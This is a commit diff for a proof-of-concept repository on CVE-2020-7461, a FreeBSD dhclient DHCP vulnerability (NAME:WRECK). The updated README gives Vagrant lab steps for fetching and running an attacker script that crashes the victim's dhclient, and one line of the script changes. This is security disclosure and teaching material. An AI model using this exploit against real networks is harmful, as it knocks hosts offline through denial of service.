update README

README.md

@@ -1,2 +1,55 @@
 # CVE-2020-7461
-PoC for DHCP vulnerability (NEW:WRECK) in FreeBSD
+PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD
+
+For educational purposes only
+
+## Environment
+- Host: macOS 11.2.1
+- Vagrant: 2.2.15
+- Victim: FreeBSD 12.1-STABLE r364849
+- Attacker: Ubuntu 20.04
+
+## Disclaimer
+This PoC will cause DoS instead of RCE to prevent abuse.
+
+## PoC 
+
+![wreck](imgs/wreck.png)
+
+### Launch VMs
+
+```
+$ cd victim
+$ vagrant up
+$ cd ..
+```
+
+```
+$ cd attacker
+$ vagrant up
+$ vagrant ssh
+vagrant@vagrant:~$ sudo apt -y update && apt -y install python3 python3-pip
+vagrant@vagrant:~$ wget https://raw.githubusercontent.com/knqyf263/CVE-2020-7461/main/poc.py
+vagrant@vagrant:~$ python3 poc.py
+Sniffing...
+```
+
+### Run dhclient
+
+Open another terminal
+
+```
+$ cd victim
+$ vagrant ssh
+vagrant@freebsd:~ % sudo dhclient em1
+DHCPREQUEST on em1 to 255.255.255.255 port 67
+Invalid forward pointer in DHCP Domain Search option compression.
+Segmentation fault
+```
+
+## References
+- https://www.forescout.com/company/resources/namewreck-breaking-and-fixing-dns-implementations/
+- https://www.freebsd.org/security/advisories/FreeBSD-SA-20:26.dhclient.asc
+
+## Author
+Teppei Fukuda

poc.py

@@ -86,4 +86,5 @@ def handle_packet(packet):
         sendp(ack, iface=iface)
 
 
+print("Sniffing...")
 sniff(iface=iface, filter=filter, prn=handle_packet)